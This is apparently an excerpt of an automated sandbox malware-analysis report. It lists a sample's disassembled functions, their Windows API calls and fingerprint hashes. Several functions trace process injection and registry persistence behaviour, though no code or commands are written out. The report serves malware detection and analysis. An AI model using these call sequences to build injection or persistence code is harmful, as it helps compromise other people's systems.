                      • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 003779FD
                      • lstrlen.KERNEL32(00000000,?,00000000,?,?,00371255,00000000,00000000,00000004), ref: 00377A15
                      • RtlAllocateHeap.NTDLL(00000000,00000002), ref: 00377A29
                      • mbstowcs.NTDLL ref: 00377A39
                        • Part of subcall function 00377E31: GetSystemTimeAsFileTime.KERNEL32(00377A4C,?,?,?,?,00000008,00377A4C,00000000,?), ref: 00377E4E
                        • Part of subcall function 00377E31: memcpy.NTDLL(00377A4C,?,00000009,?,?,?,?,00000008,00377A4C,00000000,?), ref: 00377E70
                        • Part of subcall function 00377E31: RtlAllocateHeap.NTDLL(00000000,00000013), ref: 00377E88
                        • Part of subcall function 00377E31: lstrlenW.KERNEL32(00000000,00000001,00377A4C,?,?,?,?,?,?,?,00000008,00377A4C,00000000,?), ref: 00377EA8
                        • Part of subcall function 00377E31: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 00377ECD
                      • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 00377A57
                      • CloseHandle.KERNEL32(?), ref: 00377A61
                      • HeapFree.KERNEL32(00000000,00000000,?), ref: 00377A70
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: Heap$FileFreeTime$AllocateSystemlstrlen$CloseCreateCurrentHandleLocalNameObjectSingleTempThreadWaitlstrcpymbstowcsmemcpy
                      • String ID:
                      • API String ID: 1571466277-0
                      • Opcode ID: 476d3fdf4e68a3e7dd04208e12d63b974cb6fe3877491acc15d882b3b28377cd
                      • Instruction ID: 26bceb8ccb24508eea9555639d7abef79a34994d4719dc8d2b5585953ea2c5ca
                      • Opcode Fuzzy Hash: 476d3fdf4e68a3e7dd04208e12d63b974cb6fe3877491acc15d882b3b28377cd
                      • Instruction Fuzzy Hash: 6C11E332149314BBE2336B20AC8EF6F3E6CEB457A1F108512F645A53E1E66B4D5086E0
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 006315FB, Relevance: 10.6, APIs: 7, Instructions: 62fileCOMMON
                      Download Yara Rule
                      APIs
                      • CreateFileW.KERNEL32(0063763C,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00631611
                      • CreateFileMappingW.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000000,?,00000000,?,00637614), ref: 00631627
                      • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,?,00000000,?,00637614), ref: 0063163F
                      • GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,00637614), ref: 00631651
                      • GetLastError.KERNEL32(?,00000000,?,00637614), ref: 0063165F
                      • GetLastError.KERNEL32(?,00000000,?,00637614), ref: 0063166C
                      • GetLastError.KERNEL32(?,00637614), ref: 0063167B
                      Memory Dump Source
                      • Source File: 00000010.00000002.1217259032.00631000.00000020.sdmp, Offset: 00631000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_631000_avicbrkr.jbxd
                      Similarity
                      • API ID: File$ErrorLast$Create$MappingSizeView
                      • String ID:
                      • API String ID: 2408169653-0
                      • Opcode ID: 73d9eecfad116d980135a68303c4c0382e50b74b7ec37b6c0fb2068e127e086a
                      • Instruction ID: d15e64cdb11d7aa980aa7dbb054fab52bd62eda4e0662fee434a031bb6a8e793
                      • Opcode Fuzzy Hash: 73d9eecfad116d980135a68303c4c0382e50b74b7ec37b6c0fb2068e127e086a
                      • Instruction Fuzzy Hash: 49016171206224BBD3246BB1DD8EEAB7FAEDF477B4F145504F90A96260C6214845C6F0
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 003724A8, Relevance: 10.6, APIs: 7, Instructions: 62memorystringthreadCOMMON
                      Download Yara Rule
                      APIs
                      • lstrlen.KERNEL32(00000000,00000000,00000000,00000001,?,?,?,003728E5,00371F67,00000000,00000000,?,?,?,00374C4E,00000000), ref: 003724BF
                      • RtlAllocateHeap.NTDLL(00000000,00000009,00000000), ref: 003724D2
                      • lstrcpy.KERNEL32(00000008,00000000), ref: 003724F4
                      • CreateThread.KERNEL32(00000000,00000000,0037245F,00000000,00000000,00000000), ref: 0037250C
                      • CloseHandle.KERNEL32(00000000), ref: 00372517
                      • GetLastError.KERNEL32(?,?,?,003728E5,00371F67,00000000,00000000,?,?,?,00374C4E,00000000,0039E1CF,0037D7DB,00000000,00000000), ref: 0037251F
                      • HeapFree.KERNEL32(00000000,00000000), ref: 00372530
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: Heap$AllocateCloseCreateErrorFreeHandleLastThreadlstrcpylstrlen
                      • String ID:
                      • API String ID: 521669393-0
                      • Opcode ID: 0cad7e5f59cc702ecc92d57a0064b99513c4e0af916d8cd7bac2f687f5b0ba1a
                      • Instruction ID: 75c25e1801e360226637c8e976bf233ef537518966794703ff9fb62f9941a673
                      • Opcode Fuzzy Hash: 0cad7e5f59cc702ecc92d57a0064b99513c4e0af916d8cd7bac2f687f5b0ba1a
                      • Instruction Fuzzy Hash: 7C115172504249FFDB229FA5DC88CAFBBBCFB05354B11842AF64AD3250D7359D409B60
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 00375E6E, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 59stringtimeCOMMON
                      Download Yara Rule
                      APIs
                      • lstrcmpi.KERNEL32(00000000,Main), ref: 00375E8F
                      • RtlEnterCriticalSection.NTDLL(0039D508), ref: 00375EA1
                      • RtlLeaveCriticalSection.NTDLL(0039D508), ref: 00375EB4
                      • lstrcmpi.KERNEL32(0039D520,00000000), ref: 00375ED5
                      • GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,?,00379A23,00000000), ref: 00375EE9
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: CriticalSectionTimelstrcmpi$EnterFileLeaveSystem
                      • String ID: Main
                      • API String ID: 1266740956-521822810
                      • Opcode ID: fac605b6a693279bffc9123e057015e3c6c15acd14f6b59dd4ff5263656039e8
                      • Instruction ID: d2f26892784824d9594b3ec348d64af3963ce5a6b49a4ef001422539191313fd
                      • Opcode Fuzzy Hash: fac605b6a693279bffc9123e057015e3c6c15acd14f6b59dd4ff5263656039e8
                      • Instruction Fuzzy Hash: 1D11C435515204EFDF1ADF18D949A99B7BCFF05325F06402AE509D3290D7B59D00CBD4
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 003782AB, Relevance: 9.1, APIs: 6, Instructions: 110memoryCOMMON
                      Download Yara Rule
                      APIs
                      • RtlAllocateHeap.NTDLL(00000000,?), ref: 00378360
                      • memcpy.NTDLL(00000000,00000002,-000000F6,?,?,?,0037C6E6), ref: 00378371
                      • memcpy.NTDLL(00000000,0037C6E6,0037C6E6,?,?,?,?,?,?,0037C6E6), ref: 00378387
                      • memcpy.NTDLL(00000000,?,?,00000000,0037C6E6,0037C6E6,?,?,?,?,?,?,0037C6E6), ref: 00378399
                      • memcpy.NTDLL(00000000,003973F8,00000002,00000000,?,?,00000000,0037C6E6,0037C6E6,?,?,?,?,?,?,0037C6E6), ref: 003783AC
                      • memcpy.NTDLL(00000000,?,00000002,?,?,?,?,?,?,0037C6E6), ref: 003783C1
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: memcpy$AllocateHeap
                      • String ID:
                      • API String ID: 4068229299-0
                      • Opcode ID: 00aef71375c307affad4c3f6545e60bbddc7972e1b085f0189f0119c39a8a784
                      • Instruction ID: c91a80cb62bbbe7af6ddd77aac0c796f8da5c5d8c2881de65b734b24d867d0f9
                      • Opcode Fuzzy Hash: 00aef71375c307affad4c3f6545e60bbddc7972e1b085f0189f0119c39a8a784
                      • Instruction Fuzzy Hash: AA416E76D00209FBCF22CFA8CC8499EBBB8FF44344F144056E904A7251E775DA10DB90
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 00379DC4, Relevance: 9.1, APIs: 4, Strings: 2, Instructions: 106COMMON
                      Download Yara Rule
                      APIs
                      • memcpy.NTDLL(00000000,00379FA5,00000000,?,?,?,00379FA5,00000000,?,?,8B50F445,0037AE2C), ref: 00379E02
                      • memcpy.NTDLL(?,8B50F445,?,?,?,8B50F445,0037AE2C,?,?,?,?,?,0037AE2C,?,00397048,00000000), ref: 00379E88
                      • memcpy.NTDLL(?,03F8458B,00000000,?,?,?,?,?,8B50F445,0037AE2C,?,?,?,?,?,0037AE2C), ref: 00379EBF
                      • LocalFree.KERNEL32(0037AE2C,?,?,?,?,?,?,?,?,8B50F445,0037AE2C,?,?,?,?,?), ref: 00379ECD
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: memcpy$FreeLocal
                      • String ID: q9$q9
                      • API String ID: 2365274387-4090950484
                      • Opcode ID: 7d984b7d19eaa954ae3f5a35201a8627d770b54d25ae2bec54bd86b1b3c7fdf0
                      • Instruction ID: 50c35991aaf2ebecc17377ebef4b20d69dd42cdc8b4251c6d770f354f505b3d3
                      • Opcode Fuzzy Hash: 7d984b7d19eaa954ae3f5a35201a8627d770b54d25ae2bec54bd86b1b3c7fdf0
                      • Instruction Fuzzy Hash: 74311DB680021AAFDF22EF65DC4599F3FA8FF14360B154166FC0896211E735DE609BE1
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 0063225F, Relevance: 9.1, APIs: 6, Instructions: 105threadsynchronizationinjectionCOMMON
                      Download Yara Rule
                      APIs
                      • memset.NTDLL ref: 00632282
                        • Part of subcall function 00633223: OpenProcess.KERNEL32(00000400,00000000,00637614,0063618C,0000000C,?,?,00631718,00000000,?,00637614), ref: 0063323E
                        • Part of subcall function 00633223: IsWow64Process.KERNEL32(00637624,?,0063618C,0000000C,?,?,00631718,00000000,?,00637614), ref: 0063324F
                        • Part of subcall function 00633223: CloseHandle.KERNEL32(00637624), ref: 00633262
                        • Part of subcall function 00633CB2: RtlNtStatusToDosError.NTDLL(C0000002), ref: 00633CDF
                        • Part of subcall function 00633CB2: SetLastError.KERNEL32(00000000,?,006322DE,00000000,0063244E,0063244E,00000004,?,00000000,00000000,0063605C,00000000), ref: 00633CE6
                      • ResumeThread.KERNEL32(?,00000000,0063244E,CCCCFEEB,00000000,0063244E,0063244E,00000004,?,00000000,00000000,0063605C,00000000), ref: 0063230D
                      • WaitForSingleObject.KERNEL32(00000064), ref: 0063231B
                      • SuspendThread.KERNEL32(?), ref: 0063232E
                        • Part of subcall function 00633C91: RtlNtStatusToDosError.NTDLL(00000000), ref: 00633CA9
                        • Part of subcall function 00632102: memset.NTDLL ref: 00632130
                        • Part of subcall function 00632102: ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 006321BA
                        • Part of subcall function 00632102: WaitForSingleObject.KERNEL32(00000064), ref: 006321C8
                        • Part of subcall function 00632102: SuspendThread.KERNEL32(?), ref: 006321DB
                        • Part of subcall function 00631C29: memcpy.NTDLL(?,CCCCFEEB,?,?,?,00632386,?,00632386,00632386,?,?,?,?,00000000), ref: 00631D5F
                        • Part of subcall function 00631C29: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,00632386,?,00632386,00632386,?,?,?,?,00000000), ref: 00631DB0
                        • Part of subcall function 00631C29: memcpy.NTDLL(?,00632486,00000800,?,?,?,00000000), ref: 00631E20
                        • Part of subcall function 00631C29: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 00631E4B
                        • Part of subcall function 00631C29: RtlNtStatusToDosError.NTDLL(00000000), ref: 00631E52
                        • Part of subcall function 00631C29: CloseHandle.KERNEL32(00000000), ref: 00631E61
                        • Part of subcall function 00631C29: memset.NTDLL ref: 00631E75
                      • GetLastError.KERNEL32(00000000,0063244E,0063244E,00000004,?,00000000,00000000,0063605C,00000000), ref: 0063239A
                      • ResumeThread.KERNEL32(?), ref: 006323A5
                      Memory Dump Source
                      • Source File: 00000010.00000002.1217259032.00631000.00000020.sdmp, Offset: 00631000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_631000_avicbrkr.jbxd
                      Similarity
                      • API ID: ErrorThread$ResumeStatusmemcpymemset$CloseHandleLastObjectProcessSingleSuspendWait$OpenSectionUnmapViewWow64
                      • String ID:
                      • API String ID: 1919866759-0
                      • Opcode ID: 094fbb751018d14458a6e2ae9c26b1a9eebc32180639e3047258720aba464b8f
                      • Instruction ID: b1207e6920b6d523ef6886ca4cd66915c7f82a586e5d3456ad6f8e8c5ad2ebda
                      • Opcode Fuzzy Hash: 094fbb751018d14458a6e2ae9c26b1a9eebc32180639e3047258720aba464b8f
                      • Instruction Fuzzy Hash: DE31F27190012ABFDB21AF64CC95ADEBBBAFF04360F008165F919AA250C7349E54CBD0
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 00378F69, Relevance: 9.1, APIs: 6, Instructions: 72memorystringCOMMON
                      Download Yara Rule
                      APIs
                      • lstrlenW.KERNEL32(?), ref: 00378F8D
                      • wcstombs.NTDLL ref: 00378FAD
                        • Part of subcall function 00378E10: RtlAllocateHeap.NTDLL(00000000,00397045,?), ref: 00378EB4
                        • Part of subcall function 00378E10: memcpy.NTDLL(00000000,00000000,00000000), ref: 00378ECB
                        • Part of subcall function 00378E10: HeapFree.KERNEL32(00000000,00000000), ref: 00378EDE
                        • Part of subcall function 00378E10: memcpy.NTDLL(00000000,?,?), ref: 00378EED
                        • Part of subcall function 00378E10: HeapFree.KERNEL32(00000000,00000000,?), ref: 00378F51
                      • lstrlen.KERNEL32(00000000), ref: 00378FD1
                      • mbstowcs.NTDLL ref: 00378FF3
                      • HeapFree.KERNEL32(00000000,00000000), ref: 00379005
                      • HeapFree.KERNEL32(00000000,00000000), ref: 0037901F
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: Heap$Free$lstrlenmemcpy$Allocatembstowcswcstombs
                      • String ID:
                      • API String ID: 414137170-0
                      • Opcode ID: 8e92442cb34799a04222be7cb38b888327c1bce0fe9c227d0338451397095742
                      • Instruction ID: dd023177d506136d2f3d96c0547fd99a21bbf6a02362b6bd777be9128a5c2e2e
                      • Opcode Fuzzy Hash: 8e92442cb34799a04222be7cb38b888327c1bce0fe9c227d0338451397095742
                      • Instruction Fuzzy Hash: 0A214F3291020AFFDF229FA4EC09F9A7F7DEB44350F108566F604A61A0DB7A9960DB50
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 0037D446, Relevance: 9.1, APIs: 6, Instructions: 67threadCOMMON
                      Download Yara Rule
                      APIs
                      • OpenEventA.KERNEL32(00100000,00000000), ref: 0037D475
                      • CreateEventA.KERNEL32(0039D2D8,00000001,00000000), ref: 0037D490
                      • GetLastError.KERNEL32 ref: 0037D49D
                      • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 0037D4C0
                      • InterlockedDecrement.KERNEL32(0039D18C), ref: 0037D4EC
                        • Part of subcall function 003713D6: SetEvent.KERNEL32(0039D29C,0037D502), ref: 003713E0
                        • Part of subcall function 003713D6: CloseHandle.KERNEL32(0039D29C), ref: 003713F5
                        • Part of subcall function 003713D6: HeapDestroy.KERNEL32(0039D188), ref: 00371405
                      • RtlExitUserThread.NTDLL(00000000), ref: 0037D503
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: Event$CloseCreateDecrementDestroyErrorExitHandleHeapInterlockedLastMultipleObjectsOpenThreadUserWait
                      • String ID:
                      • API String ID: 3948313429-0
                      • Opcode ID: 20591f0fdb3ae8de3e3d109b0c3875614a75993796a83dd7af0f230172679161
                      • Instruction ID: aee27759c21ebd504439f1f5e7939a6ab4450fbf58a057c98b7a4f7d649b5708
                      • Opcode Fuzzy Hash: 20591f0fdb3ae8de3e3d109b0c3875614a75993796a83dd7af0f230172679161
                      • Instruction Fuzzy Hash: BB217271A04204BFCB22AFE9DC8A99DB7BCEB44370F10456AF555E22E0D6759D408F50
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 006349E7, Relevance: 9.0, APIs: 6, Instructions: 40fileCOMMON
                      Download Yara Rule
                      APIs
                      • CreateFileW.KERNEL32(00637614,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 00634A00
                      • GetLastError.KERNEL32(?,00632D15,00000000,00637614,?,00001FD1,00000000,00000000,?,?,00631841,?,?), ref: 00634A0D
                      • WriteFile.KERNEL32(00000000,?,00001000,00637614,00000000), ref: 00634A23
                      • SetEndOfFile.KERNEL32(00000000,?,00632D15,00000000,00637614,?,00001FD1,00000000,00000000,?,?,00631841,?,?), ref: 00634A2E
                      • GetLastError.KERNEL32(?,00632D15,00000000,00637614,?,00001FD1,00000000,00000000,?,?,00631841,?,?), ref: 00634A36
                      • CloseHandle.KERNEL32(00000000), ref: 00634A3F
                      Memory Dump Source
                      • Source File: 00000010.00000002.1217259032.00631000.00000020.sdmp, Offset: 00631000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_631000_avicbrkr.jbxd
                      Similarity
                      • API ID: File$ErrorLast$CloseCreateHandleWrite
                      • String ID:
                      • API String ID: 2256172639-0
                      • Opcode ID: b30089ba65768cd2ed73c44106d9f8eee9049b6f604e8ac18ce8d167cf75a349
                      • Instruction ID: 1eb4ab6b5afbb513eafadaf1af7b1aab45ab3fc542b8c762129c74d0bc6673d6
                      • Opcode Fuzzy Hash: b30089ba65768cd2ed73c44106d9f8eee9049b6f604e8ac18ce8d167cf75a349
                      • Instruction Fuzzy Hash: BEF01D32140124BBC7205B65ED4DEAFBF6EEB466B1F009114FE1AD22A0DB319805D6E4
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 0038E5EC, Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 207sleepsynchronizationCOMMON
                      Download Yara Rule
                      APIs
                      • memset.NTDLL ref: 0038E647
                      • SetLastError.KERNEL32(00000000,?,?,?), ref: 0038E69B
                        • Part of subcall function 0038E5C9: GetSystemTimeAsFileTime.KERNEL32(00000001,?,?,?,0038E794,?,00000000,00000000,?,?,?,?,00000000,?,?,?), ref: 0038E5D2
                        • Part of subcall function 0038E5C9: _aulldiv.NTDLL(00000001,?,00002710,00000000), ref: 0038E5E5
                      • WaitForSingleObject.KERNEL32(?,?), ref: 0038E81A
                      • Sleep.KERNEL32(?,?,?,00000001,?,?,00000000,0000000C,0000000F,?,00000000,00000000,?,?,?,?), ref: 0038E82B
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: Time$ErrorFileLastObjectSingleSleepSystemWait_aulldivmemset
                      • String ID: vids
                      • API String ID: 2736876184-3767230166
                      • Opcode ID: 6a6f984ee3baa6e30dfc6d051240ff8f828d8e908aae45e68cc7445b999ee18d
                      • Instruction ID: 531032a55d2d181815c436954a47f612ee0f2d0e2a6bb807e60a7b678aed8389
                      • Opcode Fuzzy Hash: 6a6f984ee3baa6e30dfc6d051240ff8f828d8e908aae45e68cc7445b999ee18d
                      • Instruction Fuzzy Hash: E28108B1D10229EFCF12EFA4C88599DBBB9FF48700F11819AF419AB251D7719A41CF60
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 0038BD86, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 137timeCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 0038AB6D: InterlockedIncrement.KERNEL32(?), ref: 0038ABBE
                        • Part of subcall function 0038AB6D: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0038AC42
                        • Part of subcall function 0038AB6D: RtlLeaveCriticalSection.NTDLL(0039D234), ref: 0038AC49
                      • OpenProcess.KERNEL32(00000410,?,?,?,00000000,?,0000001C), ref: 0038BDE0
                      • CloseHandle.KERNEL32(00000000), ref: 0038BDFE
                      • GetSystemTimeAsFileTime.KERNEL32(?), ref: 0038BE66
                        • Part of subcall function 003712EA: RtlAllocateHeap.NTDLL(00000000,00000000,00388635), ref: 003712F6
                      • GetSystemTimeAsFileTime.KERNEL32(00000008,00000014), ref: 0038BEE5
                        • Part of subcall function 0038AC59: RtlLeaveCriticalSection.NTDLL(00000000), ref: 0038ACD6
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: Time$CriticalFileHeapLeaveSectionSystem$AllocateCloseFreeHandleIncrementInterlockedOpenProcess
                      • String ID: o
                      • API String ID: 1684844739-252678980
                      • Opcode ID: 8f7a231bbf3470d0a02444d4d364a2764b142eba9002efbe7d0570c62530b107
                      • Instruction ID: dc373099cbadf12c3794ecb29ea5f2cb66168bcdade81940f7f571b576b38a2c
                      • Opcode Fuzzy Hash: 8f7a231bbf3470d0a02444d4d364a2764b142eba9002efbe7d0570c62530b107
                      • Instruction Fuzzy Hash: 2951BF71650706AFDB22EF24D884BEAB7A8FF04700F11456AEA04DA290E771A981CB95
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 0038F8A9, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120synchronizationCOMMON
                      Download Yara Rule
                      APIs
                      • GetLastError.KERNEL32 ref: 0038FD67
                        • Part of subcall function 003712EA: RtlAllocateHeap.NTDLL(00000000,00000000,00388635), ref: 003712F6
                      • GetLastError.KERNEL32 ref: 0038FCDB
                      • WaitForSingleObject.KERNEL32(00000000), ref: 0038FCEB
                      • GetLastError.KERNEL32 ref: 0038FD0B
                        • Part of subcall function 003712FF: HeapFree.KERNEL32(00000000,?,0038BAC1), ref: 0037130B
                        • Part of subcall function 0038FD85: GetLastError.KERNEL32(?,00000016,00000000,00000000,00000004,00000004,00000002,?,00000016,00000000,00000000,00000004,00000004,?,20000013,00000000), ref: 0038FE5E
                        • Part of subcall function 0038FD85: GetLastError.KERNEL32 ref: 0038FE78
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: ErrorLast$Heap$AllocateFreeObjectSingleWait
                      • String ID: gU9
                      • API String ID: 2990221422-705701294
                      • Opcode ID: 2f9fc69a4f80cd8c092b26ae4310329d8cc74b3410213250a69dbc7b5b445047
                      • Instruction ID: af641f6c8f6af88993abd3de56d9bd0f746bdef7bd49a40d8248893540e12924
                      • Opcode Fuzzy Hash: 2f9fc69a4f80cd8c092b26ae4310329d8cc74b3410213250a69dbc7b5b445047
                      • Instruction Fuzzy Hash: 98411BB5D00309EFDF22AFA4C9849ADBBB9EF08345F2144BAE902E7254D7319E45DB50
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 0037DB6C, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 119memorysynchronizationCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 003712FF: HeapFree.KERNEL32(00000000,?,0038BAC1), ref: 0037130B
                        • Part of subcall function 00371F02: InterlockedExchange.KERNEL32(0039D190,00000000), ref: 00371F0A
                      • HeapFree.KERNEL32(00000000,0039D418), ref: 0037DC24
                      • RtlRemoveVectoredExceptionHandler.NTDLL(0039D264), ref: 0037DC5A
                      • ReleaseMutex.KERNEL32(0039D260,?,0039D270,?,00000000,003713EB), ref: 0037DC70
                      • LocalFree.KERNEL32(?,0039D270,?,00000000,003713EB), ref: 0037DCCD
                        • Part of subcall function 0037E58B: RtlEnterCriticalSection.NTDLL(0039D43C), ref: 0037E594
                        • Part of subcall function 0037E58B: Sleep.KERNEL32(0000000A,?,0039D270,?,00000000,003713EB), ref: 0037E59E
                        • Part of subcall function 0037E58B: RtlLeaveCriticalSection.NTDLL(0039D43C), ref: 0037E5C9
                        • Part of subcall function 0038ACED: RtlLeaveCriticalSection.NTDLL(003713EB), ref: 0038AD27
                        • Part of subcall function 0038ACED: HeapFree.KERNEL32(00000000,003713EB), ref: 0038AD36
                        • Part of subcall function 0038C515: SwitchToThread.KERNEL32(?,0039D270,?,00000000,003713EB), ref: 0038C540
                        • Part of subcall function 0038C515: memset.NTDLL ref: 0038C575
                        • Part of subcall function 0038C515: memset.NTDLL ref: 0038C58C
                        • Part of subcall function 0038C515: memset.NTDLL ref: 0038C5A3
                        • Part of subcall function 003882D6: GetVersion.KERNEL32(0039D270,00000000,003971C8,?,0037DB84,?,0039D270,?,00000000,003713EB), ref: 003882FA
                        • Part of subcall function 003882D6: GetModuleHandleA.KERNEL32(0039E8AE,0039F057,?,0037DB84,?,0039D270,?,00000000,003713EB), ref: 0038830E
                        • Part of subcall function 003882D6: GetProcAddress.KERNEL32(00000000,?,0037DB84,?,0039D270,?,00000000,003713EB), ref: 00388315
                        • Part of subcall function 003880F9: RtlEnterCriticalSection.NTDLL(0039D4E0), ref: 00388103
                        • Part of subcall function 003880F9: RtlLeaveCriticalSection.NTDLL(0039D4E0), ref: 0038813F
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: CriticalSection$Free$HeapLeavememset$Enter$AddressExceptionExchangeHandleHandlerInterlockedLocalModuleMutexProcReleaseRemoveSleepSwitchThreadVectoredVersion
                      • String ID: H}*
                      • API String ID: 1890117700-3236088583
                      • Opcode ID: 447d20e424f9dcf89fd3eae52b0bf5c477ffefee4168470306d2a7268b4df30a
                      • Instruction ID: 7a9d4595a82b35bac0ef7fd08da02fd2c7baae8d5b8fda70bb885b189d46a0ef
                      • Opcode Fuzzy Hash: 447d20e424f9dcf89fd3eae52b0bf5c477ffefee4168470306d2a7268b4df30a
                      • Instruction Fuzzy Hash: 50414D716043069BDB33AB69DD86A1577BDAF04B50F068427E548E72A1CBBAEC40DA60
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 0038C1AE, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 113COMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: _strupr
                      • String ID: dY9
                      • API String ID: 3408778250-2229523707
                      • Opcode ID: 23e6f58b02fdcf5163088752094d30559f60e867593895be0037ab79f8dd162e
                      • Instruction ID: db7652a75d1794cac8a10539fabb297ba8b06a287d54bb257e772b13f27635ab
                      • Opcode Fuzzy Hash: 23e6f58b02fdcf5163088752094d30559f60e867593895be0037ab79f8dd162e
                      • Instruction Fuzzy Hash: 804146718103099FDF22EFA9D885AAEB7B8FF45340F115965F824D6192D734E849CBA0
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 003727D4, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 106memorystringCOMMON
                      Download Yara Rule
                      APIs
                      • lstrlen.KERNEL32(00000000,?,?,?,00374C4E,00000000,0039E1CF,0037D7DB,00000000,00000000,00000000), ref: 00372866
                      • RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 00372879
                      • lstrcpy.KERNEL32(00000004,00000000), ref: 00372897
                        • Part of subcall function 00377D93: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 00377DA7
                        • Part of subcall function 00377D93: memcpy.NTDLL(00000000,00377EC2,?,?,00000008,?,00377EC2,00000000,00000000,?), ref: 00377DD0
                        • Part of subcall function 00377D93: RegCloseKey.ADVAPI32(?,?,00377EC2,00000000,00000000,?,?,?,?,?,?,?,?,00000008,00377A4C,00000000), ref: 00377E22
                      • HeapFree.KERNEL32(00000000,00000000,0039E1CF), ref: 003728BD
                        • Part of subcall function 003724A8: lstrlen.KERNEL32(00000000,00000000,00000000,00000001,?,?,?,003728E5,00371F67,00000000,00000000,?,?,?,00374C4E,00000000), ref: 003724BF
                        • Part of subcall function 003724A8: RtlAllocateHeap.NTDLL(00000000,00000009,00000000), ref: 003724D2
                        • Part of subcall function 003724A8: lstrcpy.KERNEL32(00000008,00000000), ref: 003724F4
